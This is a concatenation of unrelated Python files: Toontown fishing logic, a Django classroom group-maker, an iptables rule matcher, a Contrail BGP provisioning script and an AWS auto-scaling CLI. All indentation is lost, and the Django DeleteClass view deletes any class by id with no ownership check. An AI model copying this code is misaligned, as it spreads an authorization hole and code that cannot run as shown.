self.track = Sequence(Parallel(ActorInterval(self.av, 'reel'), ActorInterval(self.pole, 'cast', startFrame=63, endFrame=127)), ActorInterval(self.av, 'reel-neutral'), Func(self.__hideLine), Func(self.__hideBob), ActorInterval(self.av, 'fish-again'), Func(self.av.loop, 'pole-neutral'))
self.track.start()
def cleanupFishPanel(self):
if self.fishPanel:
self.fishPanel.hide()
self.fishPanel.destroy()
self.fishPanel = None
return
def hideBootPanel(self):
if self.madeGui and self.itemBoot:
self.__itemGuiClose()
def exitReward(self):
if self.localToonFishing:
self.itemGui.detachNode()
self.cleanupFishPanel()
self.track.finish()
self.track = None
return
def enterLeaving(self):
if self.localToonFishing:
self.__hideCastGui()
if base.wantBingo:
self.pond.cleanupBingoMgr()
self.av.stopLookAround()
self.av.startLookAround()
self.__placeAvatar()
self.__hideLine()
self.__hideBob()
self.track = Sequence(Parallel(ActorInterval(self.av, 'fish-end'), Func(self.pole.pose, 'cast', 0), LerpScaleInterval(self.pole, duration=0.5, scale=0.01, startScale=1.0)), Func(self.__dropPole), Func(self.av.loop, 'neutral'))
if self.localToonFishing:
self.track.append(Func(self.fsm.requestFinalState))
self.track.start()
def exitLeaving(self):
self.track.pause()
self.track = None
return
def enterSellFish(self):
self.castButton['state'] = DGG.DISABLED
self.__showSellFishDialog()
self.__hideHowTo()
def exitSellFish(self):
self.castButton['state'] = DGG.NORMAL
self.__hideSellFishDialog()
self.__hideSellFishConfirmDialog()
def sellFishComplete(self, trophyResult, numFishCaught):
for button in self.sellFishDialog.buttonList:
button['state'] = DGG.NORMAL
if self.localToonFishing:
if trophyResult:
self.__hideSellFishDialog()
self.__showSellFishConfirmDialog(numFishCaught)
else:
self.fsm.request('waiting', [False])
def __allowSellFish(self):
if base.wantBingo:
if self.pond.hasPondBingoManager():
hoodId = base.cr.playGame.getPlaceId()
if hoodId == ToontownGlobals.MyEstate:
return True
return False
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.datastructures import MultiValueDictKeyError
from django.shortcuts import render, redirect
from django.http import HttpResponse, Http404
from django.views import View
from random import shuffle, randint
from django.contrib.auth import authenticate, login
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.password_validation import validate_password, password_validators_help_texts
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from .models import Gruppe, GruppeElev, Klasse, Elev, Advertisement
from .forms import UserForm, LoginForm
import uuid
import operator
# Create your views here.
#Here, users can enter student names etc. and submit.
def makegroup(request, selectedclassid=0):
loginform = LoginForm(None)
error = False
errormessage = ""
classes = None
selectedclass = None
if request.user.is_authenticated:
classes = Klasse.objects.filter(user=request.user)
if selectedclassid != 0:
selectedclass = Klasse.objects.filter(id=selectedclassid).first()
context = {"error": error, "errormessage": errormessage, "loginform": loginform, "classes":classes, "selectedclass":selectedclass}
return render(request, "gruppeapp/welcome.html", context)
#Here, users can view the newly generated group!
class Creategroup(View):
def post(self, request):
numberofgroups = 1
students = []
studentCounter = request.POST["studentcounter"]
numberofgroups = int(request.POST["numberofgroupsinput"])
currentStudent=""
"""if int(request.POST["createfromclass"]) == 1:
for i in range(0, int(studentCounter)+1):
if int(request.POST["studentexists"+str(i)])==1:
if request.POST["student"+str(i)]:
students.append(request.POST["student"+str(i)])
else:"""
print(str(request.POST))
for i in range(0, int(studentCounter)+1):
print("trying to find student "+str(i))
try:
if request.POST.get("student"+str(i),0) is not 0:
print("Added student "+str(i))
currentStudent = request.POST["student"+str(i)]
if currentStudent is not "":
students.append(currentStudent)
except MultiValueDictKeyError:
error = True
errormessage = "No students added"
print("Tried to find student"+str(i))
print(str(request.POST))
context = {"error": error, "errormessage": errormessage}
return render(request, "gruppeapp/welcome.html", context)
except ValueError:
error = True
errormessage = "You didn't choose how many groups should be made"
context = {"error": error, "errormessage": errormessage}
return render(request, "gruppeapp/welcome.html", context)
shuffle(students)
linkhash=uuid.uuid4().hex
gruppe = Gruppe(link=linkhash, antalgrupper=numberofgroups)
if request.user.is_authenticated():
gruppe.user = request.user
gruppe.save()
for number, iterator in enumerate(students):
student = GruppeElev(navn=iterator, position=number, gruppe=gruppe)
student.save()
return redirect("gruppeapp:viewgroup", linkhash=linkhash)
def get(self,request):
raise Http404("Page not found")
class Creategroupfromclass(View):
def get(self,request):
return redirect("gruppeapp:makegroup")
def post(self,request):
classid=request.POST["classid"]
return redirect("gruppeapp:makegroupwithclassid", selectedclassid=classid)
class About(View):
def get(self,request):
return render(request, "gruppeapp/about.html", {"loginform":LoginForm(None)})
def post(self, request):
raise Http404("Page not found")
def viewgroup(request, linkhash):
loginform = LoginForm(None)
gruppe = Gruppe.objects.get(link=linkhash)
students = []
for student in GruppeElev.objects.filter(gruppe=gruppe):
students.append(student)
smallqueryset = Advertisement.objects.filter(size="small").order_by('?')
bigqueryset = Advertisement.objects.filter(size="large").order_by('?')
print(str(bigqueryset))
smalloverhead = smallqueryset.first()
bigoverhead = bigqueryset.first()
try:
smallunderhead = smallqueryset[1]
bigunderhead = bigqueryset[1]
except IndexError:
smallunderhead = smalloverhead
bigunderhead = bigoverhead
context = {
"students": students,
"numberofgroups": gruppe.antalgrupper,
"numberofgroupsrange": range(0,gruppe.antalgrupper),
"loginform": loginform,
"smalloverhead": smalloverhead,
"bigoverhead": bigoverhead,
"smallunderhead": smallunderhead,
"bigunderhead": bigunderhead,
}
return render(request, "gruppeapp/viewgroup.html", context)
class SignUpView(View):
form_class=UserForm
template_name="gruppeapp/registration_form.html"
def post(self, request):
form = self.form_class(request.POST)
loginform = LoginForm(None)
if form.is_valid():
user = form.save(commit=False)
user.username = form.cleaned_data["username"]
user.email = form.cleaned_data["email"]
password = form.cleaned_data["password1"]
try:
validate_password(password)
except(ValidationError):
return render(request, self.template_name, {"form": form, "errorhelp": password_validators_help_texts(), "loginform": loginform,})
user.set_password(password)
user.save()
user = authenticate(username=form.cleaned_data["username"], password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect("gruppeapp:makegroup")
return render(request, self.template_name, {"form": form,"errorhelp": password_validators_help_texts(), "loginform": loginform,})
def get(self, request):
form = self.form_class(None)
loginform = LoginForm(None)
return render(request, self.template_name, {"form": form,"errorhelp": password_validators_help_texts(), "loginform": loginform,})
class LoginView(View):
def post(self, request):
form = LoginForm(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
if request.POST.get('remember_me', None):
print("remember_me!")
request.session.set_expiry(60*60*24*30)
else:
print("No remember_me!")
request.session.set_expiry(360)
return redirect("gruppeapp:makegroup")
else:
return redirect("gruppeapp:makegroup")
else:
return redirect("gruppeapp:makegroup")
def get(self, request):
return redirect("gruppeapp:makegroup")
class MyClassesView(View):
template_name="gruppeapp/myclasses.html"
def post(self, request):
if request.user.is_authenticated:
classid = 0
#print("Post: "+str(sorted(request.POST, key=operator.itemgetter(0))))
for key in request.POST: #Gets class id and deletes every student of that class
if key.endswith("classid"):
classid = request.POST[key]
currentclass = Klasse.objects.filter(id=classid)[0]
currentclass.elev_set.all().delete()
for key in sorted(request.POST):
if key.endswith("name"): #gets the name of a student and creates it.
currentstudentname = request.POST[key]
currentclass = Klasse.objects.filter(id=classid)[0]
student = Elev(navn=currentstudentname, klasse=currentclass)
student.save()
elif key.endswith("newstudentname"):
currentstudentname = request.POST[key]
currentclass = Klasse.objects.filter(id=classid)[0]
student = Elev(navn=currentstudentname, klasse=currentclass)
student.save()
classes = Klasse.objects.filter(user=request.user)
classfromquery = classes.filter(pk=classid).first()
return render(request, self.template_name,{"classes": classes, "loginform": LoginForm(None), "currentclass":classfromquery})
def get(self, request, currentclass=0):
if request.user.is_authenticated:
classes = Klasse.objects.filter(user=request.user)
# print("Thing!"+str(classes.first().id))
print("Currentclass="+str(currentclass))
if currentclass is not 0:
classfromquery = classes.filter(pk=currentclass).first()
else:
classfromquery = classes.first()
print("Class from query:"+str(classfromquery))
context = {"classes": classes, "loginform": LoginForm(None), "currentclass": classfromquery}
return render(request, self.template_name, context)
else:
context = {"loginerror": True, "loginform":LoginForm(None)}
return render(request, self.template_name, context)
class CreateNewClass(View):
def post(self, request):
if request.user.is_authenticated:
classname=request.POST["classname"]
description = request.POST["classdescription"]
newclass = Klasse(navn=classname, description=description, user=request.user)
newclass.save()
return redirect("gruppeapp:myclasses")
else:
raise Http404("Page not found")
def get(self, request):
return redirect("gruppeapp:myclasses")
class DeleteClass(View):
def post(self, request):
classid=request.POST["classid"]
Klasse.objects.filter(id=classid).delete()
return redirect("gruppeapp:myclasses")
def get(self, request):
return redirect("gruppeapp:myclasses")
def privacypolicy(request):
return render(request, "gruppeapp/privacypolicy.htm")
| |
from netaddr import *
from IPy import IP
import itertools
import socket
import re
import json
import sys
import os
PLUGINPATH = "plugins"
class Match(object):
def __init__(self, name, rule=None):
self.name = name
self.rule = rule
def __getattr__(self, name):
try:
return super(Match, self).__getattribute__(name)
except KeyError:
raise AttributeError
def __setattr__(self, key, value):
key = key.replace("-", "_")
super(Match, self).__setattr__(key, value)
class Rule(object):
""" Rules are entries in chains
"""
def __init__(self, chain=None):
self.chain = chain
self._matches = []
self._target = None
self._proto = None
self._src = None
self._dst = None
self._sgroup = -1
self._dgroup = -1
self._isDefault = False
def create_match(self, name):
match = Match(name)
self.add_match(match)
return match
def add_match(self, match):
match.rule = self
self._matches.append(match)
def remove_match(self, match):
self._matches.remove(match)
def _get_target(self):
return self._target
def _set_target(self, target):
self._target = target
target = property(_get_target, _set_target)
def _get_proto(self):
return self._proto
def _set_proto(self, protocol):
self._proto = protocol
protocol = property(_get_proto, _set_proto)
def get_src(self):
return self._src
def set_src(self, src):
self._src = src
src = property(get_src, set_src)
def get_dst(self):
return self._dst
def set_dst(self, dst):
self._dst = dst
dst = property(get_dst, set_dst)
def _get_sgroup(self):
return self._sgroup
def _set_sgroup(self, group):
self._sgroup = group
sgroup = property(_get_sgroup, _set_sgroup)
def _get_dgroup(self):
return self._dgroup
def _set_dgroup(self, dgroup):
self._dgroup = dgroup
dgroup = property(_get_dgroup, _set_dgroup)
class Chain(object):
_cache = dict()
def __new__(cls, table, name):
obj = Chain._cache.get(table.name + "." + name, None)
if not obj:
obj = object.__new__(cls)
obj.__init__(table, name)
Chain._cache[table.name + "." + name] = obj
obj._rules = []
return obj
def __init__(self, table, name):
self.name = name
self.table = table
table.add_chain(self)
#self._rules = []
def append_rule(self, rule):
self._rules.append(rule)
rule.chain = self
def insert_rule(self, rule, position=0):
self._rules.insert(position, rule)
rule.chain = self
def replace_rule(self, rule, position=0):
self._rules[position] = rule
rule.chain = self
def get_rule(self, position=0):
return self._rules[position]
def delete_rule(self, position=-1):
if position < 0:
print "wrong position"
return
del self._rules[position]
class Table(object):
FILTER = "filter"
"""This is the constant for the filter table."""
MANGLE = "mangle"
"""This is the constant for the mangle table."""
RAW = "raw"
"""This is the constant for the raw table."""
NAT = "nat"
"""This is the constant for the nat table."""
ALL = ["filter", "mangle", "raw", "nat"]
_cache = dict()
def __new__(cls, name):
obj = Table._cache.get(name, None)
if not obj:
obj = object.__new__(cls)
obj.__init__(name)
Table._cache[name] = obj
obj.chains = dict()
return obj
def __init__(self, name):
self.name = name
#self.chains = dict()
def add_chain(self, chain):
if chain.name not in self.chains:
self.chains[chain.name] = chain
#else :
# raise ValueError("chain already exist")
def get_chain(self, chain_name):
return self.chains[chain_name]
def delete_chain(self, chain):
if chain.name not in self.chians:
raise ValueError("nothing to delete")
else:
del self.chains[chain.name]
#Stores all the information for a given group in a group config file and provides an abstraction in case
#the format of the group data changes.
class GroupData(object):
def __init__(self,groupFile):
file = open(groupFile)
self.data = json.JSONDecoder().decode(file.read())
file.close()
def isGroup(self,inputGroup):
try:
self.data[inputGroup]
return True
except:
return False
def reload(self,fileName):
file = open(fileName)
self.data = json.JSONDecoder().decode(file.read())
file.close()
def checkRe(self,input,pattern):
if input == pattern and ((pattern[0] != "'") and (pattern[len(pattern) - 1] != "'")) :
return True
elif ((pattern[0] == "'") and (pattern[len(pattern) - 1] == "'")):
rePattern = pattern[1:(len(pattern) - 1)]
if re.match(rePattern,input) != None:
print("RE MATCH")
return True
return False
def isIp(self,inputIp,groupName):
ipList = self.data[groupName]["IPv4"]
for ip in ipList:
if ip:
if self.checkRe(inputIp,ip):
return True
return False
def isFQDN(self,inputIp,groupName):
try:
inputFQDN = socket.getfqdn(str(inputIp))
except:
return False
fqdnList = self.data[groupName]["FQDN"]
if fqdnList:
for fqdn in fqdnList:
if fqdn:
if self.checkRe(inputFQDN,fqdn):
return True
return False
else:
return False
def isSubnet(self,inputIp,groupName):
inputIp = IPAddress(inputIp)
subList = self.data[groupName]["Subnet"]
for subnet in subList:
try:
expandSub = IPNetwork(subnet)
except:
continue
for ip in expandSub:
if ip == inputIp:
return True
return False
class Comparison(object):
def __init__(self, table,groupData):
self.table = table
self.groupData = groupData
self.plugins = {}
try:
self.loadPlugins(self.plugins)
except:
pass
def loadPlugins(self,pluginList):
sys.path.insert(0,PLUGINPATH)
for file in os.listdir(PLUGINPATH):
fname,ext = os.path.splitext(file)
if ext == ".py":
mod = __import__(fname)
pluginList[fname] = mod.Plugin()
sys.path.pop(0)
print "Plugins",pluginList
def portMatch(self, portnum, portRange):
ports = [int(s) for s in portRange]
print "INPUT PORTS",ports
print "COMPARISION PORT",portnum
if len(ports) == 0 or portnum == -1:
print "PORTS MATCHED0"
return True
elif len(ports) == 1:
if portnum == ports[0]:
print "PORTS MATCHED1"
return True
else:
if portnum >= ports[0] and portnum <= ports[1]:
print "PORTS MATCHED"
return True
print "PORTS NOT MATCHED"
return False
#Is the input a valid ip address? If so return false as it can't be a dns hostname.
def isDNS(self,str):
try:
IP(str)
except ValueError:
return True
return False
#Take in an ip and get the right hostname, use this to compare to a hostname that might be in a group list.
def hasHostname(self,ip):
try:
socket.gethostbyaddr(str(ip))
except:
return (False,None)
return (True,(socket.gethostbyaddr(str(ip))[0]))
# ipMatch1 is used to test -s with ip subnet
def ipMatch1(self, ip, cmpIP):
print "IN IPMATCH1"
if cmpIP == None or cmpIP == '0.0.0.0/0.0.0.0':
print "Blank or None cmpIP"
return True
if ip == None:
return False
if self.isDNS(str(cmpIP)):
cmpIP = socket.gethostbyname(str(cmpIP))
if '/' in cmpIP:
ipset = IPSet([cmpIP])
if ip in ipset:
return True
else:
if ip == cmpIP:
print "RETURNING TRUE IPMATCH1"
return True
print "RETURING FALSE IPMATCH1"
return False
#ipMatch2 is used to test ipRange
def ipMatch2(self, ip, ipRange):
if len(ipRange) == 0:
return True
if ip == None:
return False
if len(ipRange) == 2:
iprange = IPRange(ipRange[0], ipRange[1])
if ip in iprange:
return True
elif ip == ipRange[0]:
return True
return False
#Test if two ips are from the same group file
def groupMatch(self,sIp,dIp,sGroup,dGroup):
sGroupMatch = False
dGroupMatch = False
if (self.groupData.isGroup(sGroup) == False) or (self.groupData.isGroup(dGroup) == False):
return False
else:
#Verify the source ip has a match in some group
#self.groupData.__getattribute__('isIp')
if (self.groupData.isIp(sIp,sGroup)):
sGroupMatch = True
elif (self.groupData.isFQDN(sIp,sGroup)):
sGroupMatch = True
elif (self.groupData.isSubnet(sIp,sGroup)):
sGroupMatch = True
#Assume that each plugin vas a verify method for checking if an ip is in a group and use it
else:
for plugin in self.plugins.values():
try:
if plugin.verify(sIp,sGroup):
sGroupMatch = True
except:
print "Error in plugin:",self.plugins.keys()[self.plugins.values().index(plugin)], "when matching source group"
continue
#Verify the destination ip has a match in some group
if (self.groupData.isIp(dIp,dGroup)):
dGroupMatch = True
elif (self.groupData.isFQDN(dIp,dGroup)):
dGroupMatch = True
elif (self.groupData.isSubnet(dIp,dGroup)):
dGroupMatch = True
#Is the destination ip and group verified by a plugin method?
else:
for plugin in self.plugins.values():
try:
if plugin.verify(dIp,dGroup):
dGroupMatch = True
except:
print "Error in plugin:",self.plugins.keys()[self.plugins.values().index(plugin)], "when matching destination group"
continue
if sGroupMatch and dGroupMatch:
return True
else:
return False
def compare(self, proto, tsIp=None, tdIp=None, tsPort=-1, tdPort=-1):
matched_rule = {}
for key in self.table.chains:
print "KEY ",key
chain = self.table.chains[key]
for rule in chain._rules:
dport = []
sport = []
srange = []
drange = []
src = rule.src
dst = rule.dst
sgroup = rule.sgroup
print "SGROUP: ", rule.sgroup
dgroup = rule.dgroup
print "DGROUP: ", rule.dgroup
if proto != rule.protocol:
continue
for match in rule._matches:
if 'dport' in dir(match):
dport = match.dport.split(':')
if 'sport' in dir(match):
sport = match.sport.split(':')
if 'src_range' in dir(match):
srange = match.src_range.split('-')
if 'dst_range' in dir(match):
drange = match.dst_range.split('-')
print "RULE.sGROUP ",rule.sgroup
print "RULE.dGROUP ",rule.dgroup
if rule.sgroup != -1:
print "tsIp=",tsIp
print "tdIp=",tdIp
print "sgroup=",sgroup
print "dgroup=",dgroup
print "sport=",sport
print "dport=",dport
print "tsPort=",tsPort
print "tdPort=",tdPort
print "ruleSource=", src
print "ruleDst=", dst
if (self.groupMatch(tsIp,tdIp,sgroup,dgroup)) and (self.portMatch(tsPort, sport)) and (self.portMatch(tdPort, dport)):
matched_rule['src'] = tsIp
matched_rule['dst'] = tdIp
matched_rule['proto'] = rule.protocol
matched_rule['target'] = rule.target
return matched_rule
elif rule.sgroup == -1:
print "GOT INTO ELSE"
print "tsIp=",tsIp
print "tdIp=",tdIp
print "sgroup=",sgroup
print "dgroup=",dgroup
print "ruleSource=", src
print "ruleDst=", dst
if (self.ipMatch1(tsIp, src)) and (self.ipMatch1(tdIp, dst)) \
and (self.portMatch(tsPort, sport)) and (self.portMatch(tdPort, dport)) \
and (self.ipMatch2(tsIp, srange)) and (self.ipMatch2(tdIp, drange)):
matched_rule['src'] = tsIp
matched_rule['dst'] = tdIp
matched_rule['proto'] = rule.protocol
matched_rule['target'] = rule.target
print "TARGET THING2 " , rule.target
return matched_rule
return matched_rule
| |
#!/usr/bin/python
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import argparse
import ConfigParser
import json
import copy
from netaddr import IPNetwork
from vnc_api.vnc_api import *
def get_ip(ip_w_pfx):
return str(IPNetwork(ip_w_pfx).ip)
# end get_ip
class VncProvisioner(object):
def __init__(self, args_str=None):
self._args = None
if not args_str:
args_str = ' '.join(sys.argv[1:])
self._parse_args(args_str)
self._prov_info = self._read_provision_data()
prov_info = self._prov_info
self._bgp_addr_fams = AddressFamilies(['inet-vpn'])
self._bgp_sess_attrs = [
BgpSessionAttributes(address_families=self._bgp_addr_fams)]
self._bgp_sessions = [BgpSession(attributes=self._bgp_sess_attrs)]
self._bgp_peering_attrs = BgpPeeringAttributes(
session=self._bgp_sessions)
self._vnc_lib = VncApi(self._args.admin_user,
self._args.admin_password,
self._args.admin_tenant_name,
self._args.api_server_ip,
self._args.api_server_port, '/')
vnc_lib = self._vnc_lib
gsc_obj = vnc_lib.global_system_config_read(
fq_name=['default-global-system-config'])
gsc_obj.set_autonomous_system(prov_info['bgp-asn'])
if 'ibgp-auto-mesh' in prov_info:
gsc_obj.set_ibgp_auto_mesh(prov_infoi['ibgp-auto-mesh'])
vnc_lib.global_system_config_update(gsc_obj)
self._global_system_config_obj = gsc_obj
# TODO pick fqname hardcode from common
rt_inst_obj = vnc_lib.routing_instance_read(
fq_name=['default-domain', 'default-project',
'ip-fabric', '__default__'])
self._fab_rt_inst_obj = rt_inst_obj
vrouter_hosts = []
for host in prov_info['hosts']:
for role in host['roles']:
if role['type'] == 'bgp':
param = role['params']
self.add_bgp_router(host['name'], host['ip'])
elif role['type'] == 'compute':
vrouter_hosts.append((host, role))
for host, role in vrouter_hosts:
param = role['params']
self.add_vrouter(host['name'], host['ip'], param['bgp'])
# end __init__
def add_vrouter(self, name, ip, bgps):
vnc_lib = self._vnc_lib
gsc_obj = self._global_system_config_obj
vrouter_obj = VirtualRouter(
name, gsc_obj, virtual_router_ip_address=ip)
for bgp in bgps:
bgp_router_fq_name = copy.deepcopy(
self._fab_rt_inst_obj.get_fq_name())
bgp_router_fq_name.append(bgp)
bgp_router_obj = vnc_lib.bgp_router_read(
fq_name=bgp_router_fq_name)
vrouter_obj.add_bgp_router(bgp_router_obj)
vnc_lib.virtual_router_create(vrouter_obj)
# end add_vrouter
def add_bgp_router(self, name, ip):
vnc_lib = self._vnc_lib
gsc_obj = self._global_system_config_obj
router_params = BgpRouterParams(
autonomous_system=gsc_obj.get_autonomous_system(),
identifier=get_ip(ip), address=get_ip(ip), port=179,
address_families=self._bgp_addr_fams)
bgp_router_obj = BgpRouter(name, self._fab_rt_inst_obj,
bgp_router_parameters=router_params)
cur_id = vnc_lib.bgp_router_create(bgp_router_obj)
cur_obj = vnc_lib.bgp_router_read(id=cur_id)
# full-mesh with existing bgp routers
fq_name = self._fab_rt_inst_obj.get_fq_name()
bgp_router_list = vnc_lib.bgp_routers_list(
routing_instance_fq_name=fq_name)
bgp_router_ids = [bgp_dict['uuid']
for bgp_dict in bgp_router_list['bgp-routers']]
bgp_router_objs = []
for id in bgp_router_ids:
bgp_router_objs.append(vnc_lib.bgp_router_read(id=id))
for other_obj in bgp_router_objs:
if other_obj.uuid == cur_id:
continue
other_obj.add_bgp_router(cur_obj, self._bgp_peering_attrs)
vnc_lib.bgp_router_update(other_obj)
cur_obj.add_bgp_router(other_obj, self._bgp_peering_attrs)
vnc_lib.bgp_router_update(cur_obj)
# end add_bgp_router
def _parse_args(self, args_str):
'''
Eg. python provision.py --prov_data_file provision.json
--api_server_ip 127.0.0.1
--api_server_port 8082
'''
# Source any specified config/ini file
# Turn off help, so we print all options in response to -h
conf_parser = argparse.ArgumentParser(add_help=False)
conf_parser.add_argument("-c", "--conf_file",
help="Specify config file", metavar="FILE")
args, remaining_argv = conf_parser.parse_known_args(args_str.split())
defaults = {
'prov_data_file': 'provision.json',
'api_server_ip': '127.0.0.1',
'api_server_port': '8082',
}
ksopts = {
'admin_user': 'user1',
'admin_password': 'password1',
'admin_tenant_name': 'default-domain'
}
if args.conf_file:
config = ConfigParser.SafeConfigParser()
config.read([args.conf_file])
defaults.update(dict(config.items("DEFAULTS")))
if 'KEYSTONE' in config.sections():
ksopts.update(dict(config.items("KEYSTONE")))
# Override with CLI options
# Don't surpress add_help here so it will handle -h
parser = argparse.ArgumentParser(
# Inherit options from config_parser
parents=[conf_parser],
# print script description with -h/--help
description=__doc__,
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter,
)
defaults.update(ksopts)
parser.set_defaults(**defaults)
parser.add_argument(
"--prov_data_file", help="File name of provision data in json")
parser.add_argument(
"--api_server_ip", help="IP address of api server")
parser.add_argument("--api_server_port", help="Port of api server")
parser.add_argument(
"--admin_user", help="Name of keystone admin user")
parser.add_argument(
"--admin_password", help="Password of keystone admin user")
parser.add_argument(
"--admin_tenant_name", help="Tenamt name for keystone admin user")
self._args = parser.parse_args(remaining_argv)
# end _parse_args
def _read_provision_data(self):
prov_file = open(self._args.prov_data_file, 'r')
prov_data = prov_file.read()
return json.loads(prov_data)
# end _read_provision_data
# end class VncProvisioner
def main(args_str=None):
VncProvisioner(args_str)
# end main
if __name__ == "__main__":
main()
| |
from AwsProcessor import *
from stdplusAwsHelpers.AwsConnectionFactory import AwsConnectionFactory
from CommandArgumentParser import *
from joblib import Parallel, delayed
import boto3
import stdplus
import Config
class AwsAutoScalingGroup(AwsProcessor):
def __init__(self,scalingGroup,parent):
AwsProcessor.__init__(self,parent.raw_prompt + "/asg:" + scalingGroup,parent)
self.client = AwsConnectionFactory.getAsgClient()
self.scalingGroup = scalingGroup
self.activities = None
self.do_printInstances('-r')
def do_printActivities(self,args):
"""Print scaling activities"""
parser = CommandArgumentParser("printActivities")
parser.add_argument('-r','--refresh',action='store_true',dest='refresh',help='refresh');
args = vars(parser.parse_args(args))
refresh = args['refresh'] or not self.activities
if refresh:
response = self.client.describe_scaling_activities(AutoScalingGroupName=self.scalingGroup)
self.activities = response['Activities']
index = 0
for activity in self.activities:
print "{}: {} -> {} {}: {}".format(index,activity['StartTime'],stdplus.defaultifyDict(activity,'EndTime',''),activity['StatusCode'],activity['Description'])
index = index + 1
def do_printActivity(self,args):
"""Print scaling activity details"""
parser = CommandArgumentParser("printActivity")
parser.add_argument(dest='index',type=int,help='refresh');
args = vars(parser.parse_args(args))
index = args['index']
activity = self.activities[index]
pprint(activity)
def do_printInstances(self,args):
"""Print the list of instances in this auto scaling group. printInstances -h for detailed help"""
parser = CommandArgumentParser("printInstances")
parser.add_argument(dest='filters',nargs='*',default=["*"],help='Filter instances');
parser.add_argument('-a','--addresses',action='store_true',dest='addresses',help='list all ip addresses');
parser.add_argument('-t','--tags',action='store_true',dest='tags',help='list all instance tags');
parser.add_argument('-d','--allDetails',action='store_true',dest='details',help='print all instance details');
parser.add_argument('-r','--refresh',action='store_true',dest='refresh',help='refresh');
parser.add_argument('-z','--zones',dest='availabilityZones',nargs='+',help='Only include specified availability zones');
args = vars(parser.parse_args(args))
client = AwsConnectionFactory.getEc2Client()
filters = args['filters']
addresses = args['addresses']
tags = args['tags']
details = args['details']
availabilityZones = args['availabilityZones']
needDescription = addresses or tags or details
if args['refresh']:
self.scalingGroupDescription = self.client.describe_auto_scaling_groups(AutoScalingGroupNames=[self.scalingGroup])
# print "AutoScaling Group:{}".format(self.scalingGroup)
print "=== Instances ==="
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instances = filter( lambda x: fnmatches(x['InstanceId'],filters),instances)
if availabilityZones:
instances = filter( lambda x: fnmatches(x['AvailabilityZone'],availabilityZones),instances)
index = 0
for instance in instances:
instance['index'] = index
print "* {0:3d} {1} {2} {3}".format(index,instance['HealthStatus'],instance['AvailabilityZone'],instance['InstanceId'])
description = None
if needDescription:
description = client.describe_instances(InstanceIds=[instance['InstanceId']])
if addresses:
networkInterfaces = description['Reservations'][0]['Instances'][0]['NetworkInterfaces']
number = 0
print " Network Interfaces:"
for interface in networkInterfaces:
print " * {0:3d} {1}".format(number, interface['PrivateIpAddress'])
number +=1
if tags:
tags = description['Reservations'][0]['Instances'][0]['Tags']
print " Tags:"
for tag in tags:
print " * {0} {1}".format(tag['Key'],tag['Value'])
if details:
pprint(description)
index += 1
def do_printPolicy(self,args):
"""Print the autoscaling policy"""
parser = CommandArgumentParser("printPolicy")
args = vars(parser.parse_args(args))
policy = self.client.describe_policies(AutoScalingGroupName=self.scalingGroup)
pprint(policy)
def do_rebootInstance(self,args):
"""Restart specified instance"""
parser = CommandArgumentParser("rebootInstance")
parser.add_argument(dest='instance',help='instance index or name');
args = vars(parser.parse_args(args))
instanceId = args['instance']
try:
index = int(instanceId)
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instanceId = instances[index]
except ValueError:
pass
client = AwsConnectionFactory.getEc2Client()
client.reboot_instances(InstanceIds=[instanceId['InstanceId']])
def do_setDesiredCapacity(self,args):
"""Set the desired capacity"""
parser = CommandArgumentParser("setDesiredCapacity")
parser.add_argument(dest='value',type=int,help='new value');
args = vars(parser.parse_args(args))
value = int(args['value'])
print "Setting desired capacity to {}".format(value)
client = AwsConnectionFactory.getAsgClient()
client.set_desired_capacity(AutoScalingGroupName=self.scalingGroup,DesiredCapacity=value,HonorCooldown=True)
print "Scaling activity in progress"
def do_run(self,args):
"""SSH to each instance in turn and run specified command"""
parser = CommandArgumentParser("run")
parser.add_argument('-R','--replace-key',dest='replaceKey',default=False,action='store_true',help="Replace the host's key. This is useful when AWS recycles an IP address you've seen before.")
parser.add_argument('-Y','--keyscan',dest='keyscan',default=False,action='store_true',help="Perform a keyscan to avoid having to say 'yes' for a new host. Implies -R.")
parser.add_argument('-ii','--ignore-host-key',dest='ignore-host-key',default=False,action='store_true',help='Ignore host key')
parser.add_argument('-ne','--no-echo',dest='no-echo',default=False,action='store_true',help='Do not echo command')
parser.add_argument(dest='command',nargs='+',help="Command to run on all hosts.") # consider adding a filter option later
parser.add_argument('-v',dest='verbosity',default=0,action=VAction,nargs='?',help='Verbosity. The more instances, the more verbose');
parser.add_argument('-j',dest='jobs',type=int,default=1,help='Number of hosts to contact in parallel');
parser.add_argument('-s',dest='skip',type=int,default=0,help='Skip this many hosts');
parser.add_argument('-m',dest='macro',default=False,action='store_true',help='{command} is a series of macros to execute, not the actual command to run on the host');
args = vars(parser.parse_args(args))
replaceKey = args['replaceKey']
keyscan = args['keyscan']
verbosity = args['verbosity']
jobs = args['jobs']
skip = args['skip']
ignoreHostKey = args['ignore-host-key']
noEcho = args['no-echo']
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instances = instances[skip:]
# if replaceKey or keyscan:
# for instance in instances:
# stdplus.resetKnownHost(instance)
if args['macro']:
if len(args['command']) > 1:
print("Only one macro may be specified with the -m switch.")
return
else:
macro = args['command'][0]
print("Macro:{}".format(macro))
command = Config.config['ssh-macros'][macro]
else:
command = ' '.join(args['command'])
Parallel(n_jobs=jobs)(
delayed(ssh)(instance['InstanceId'],0,[],replaceKey,keyscan,False,verbosity,command,ignoreHostKey=ignoreHostKey,echoCommand=not noEcho,name="{}:{}: ".format(instance['index'],instance['InstanceId'])) for instance in instances
)
def do_ssh(self,args):
"""SSH to an instance. ssh -h for detailed help"""
parser = CommandArgumentParser("ssh")
parser.add_argument(dest='instance',help='instance index or name');
parser.add_argument('-a','--address-number',default='0',dest='interface-number',help='instance id of the instance to ssh to');
parser.add_argument('-ii','--ignore-host-key',dest='ignore-host-key',default=False,action='store_true',help='Ignore host key')
parser.add_argument('-ne','--no-echo',dest='no-echo',default=False,action='store_true',help='Do not echo command')
parser.add_argument('-L',dest='forwarding',nargs='*',help="port forwarding string of the form: {localport}:{host-visible-to-instance}:{remoteport} or {port}")
